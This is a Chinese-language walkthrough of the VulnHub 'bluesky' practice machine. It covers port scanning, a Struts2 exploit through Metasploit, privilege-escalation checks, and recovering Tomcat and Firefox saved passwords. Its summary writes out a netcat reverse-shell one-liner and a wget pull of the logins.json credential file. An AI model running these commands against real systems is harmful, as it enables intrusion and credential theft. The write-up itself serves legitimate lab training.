16. bluesky 靶機

靶場地址：https://www.vulnhub.com/entry/bluesky-1,623/

writeup 參考：https://zhuanlan.zhihu.com/p/353633797

簡介

總結：

1. dirsearch 字典中沒有框架信息，例如 struts2-showcase 目錄。所以就不知道有這個框架。

   在 github 常見字典沒找到。

   burp scanner 也沒跑出來。

   只能收集，添加。

2. 獲取 shell 後，不知道哪些文件是敏感文件。

3. 可以通過獲取 tomcat manage 密碼，部署 war shell。

4. 火狐瀏覽器密碼解密。

   https://github.com/lclevy/firepwd

   lazagne 是一個集合，但必須直接上傳到目標網站運行。

5. 通過 python 模塊傳遞文件。

   python -m http.server 6666
   
   wget http://192.168.200.132:6666/logins.json
   

6. 新的反彈 shell 方式：

   # target
   mknod /tmp/mypipe p
   /bin/bash 0</tmp/mypipe | nc 192.168.200.128 6666 1>/tmp/mypipe
   
   # me
   nc -lp 6666
   

探測端口及服務

首先，使用 nmap 掃描目標，看開放哪些端口。

發現開放兩個端口，再使用腳本探測其版本

尋找已知exp

openssh

searchsploit 搜索一下版本，看是否有什麼漏洞。

除了用戶名枚舉外，沒什麼值得注意的漏洞。此處可以嘗試弱口令，但不要抱太大希望，先放放，後面如果沒有思路可以嘗試嘗試。

tomcat

接下來搜索 tomcat 是否存在已知漏洞。

唯一有點關聯的就是這個，但下載下來仔細一看，版本不符合。

web 滲透

接下來進入網頁中嘗試看看有沒有什麼網頁功能可以利用。

先用 dirsearch 掃一下目錄，發現沒有多少值得注意的。

沒思路，看下 writeup ，說此處存在 struts2 框架。

看了下 dirsearch 字典，裏面的確沒有，掃不出來。

在網上找了一下是否有框架類字典，發現 SecLists 、 Fuzzdb 等主流字典中都沒有框架字典。

用 vulmap 掃是否存在 struts2 漏洞。

看來是存在漏洞，接下來直接利用。

先看 msf 中是否有exp，有，就直接利用。若沒有，則用searchsploit 。

設置完成後直接運行。成功獲取 shell

提權

先使用命令查看基本信息，

uname -a
id 
groups
cat /etc/passwd

只發現當前用戶在 sudo 組。

再看看當前用戶目錄下文件。

.bash_history   
.sudo_as_admin_successful   # 說明用戶有 sudo 權限。
.viminfo 其中有
	/usr/local/tomcat/conf/tomcat-users.xml   #有tomcat 用戶及密碼
		根據這個密碼，如果tomcat 有高權限的話，一樣能幹事。嘗試 ps -ef | grep tomcat 看tomcat 是否以root 用戶運行？結果並非root

user.txt
	提醒我們要獲取root 權限

使用 linPeas 提權輔助腳本

這個腳本等於集合了跟提權相關的探測命令。通過掃描，發現以下有用信息。

首先嚐試系統漏洞提權

搜索是否存在系統 exp ，本地運行 ./linux-exploit-suggester-2.pl -k 4.4.0

一個個嘗試，發現沒有符合的，看來只能嘗試其它方法了。

這裏有一個坑點，就是 明明 髒牛漏洞 只存在於 Linux Kernel 2.6.22 < 3.9 (x86/x64) 。

發現一個新項目，收錄最新的提權技術，不過需要自己嘗試編寫 exp https://github.com/xairy/linux-kernel-exploitation

既然系統漏洞提權是沒可能，那就從其它方面入手。

看 sudo 是否存在漏洞

失敗，因爲對方沒有安裝 gcc。

tomcat 是否以高權限用戶運行

有了 tomcat 密碼，如果 tomcat 是以高權限運行的話我們也能搞一些事情。

ps -ef | grep tomcat 結果只是以普通用戶運行。

幾個 passwd 文件

沒有什麼值得關注的。

第三方軟件提權

看是否因爲第三方軟件存在明顯漏洞。 vulmap

python3 /tmp/vulmap-linux.py

暈，居然python 版本爲 3.5 ，運行不了。。由於繼續處理下去有點麻煩。就先越過這步。。

火狐瀏覽器的敏感文件

當時第一次卡在這裏，然後看 writeup 說可以用工具獲取火狐密碼。

使用 https://github.com/lclevy/firepwd 來解密。

https://github.com/AlessandroZ/LaZagne 可以解密很多應用密碼。但是隻能上傳到目標系統。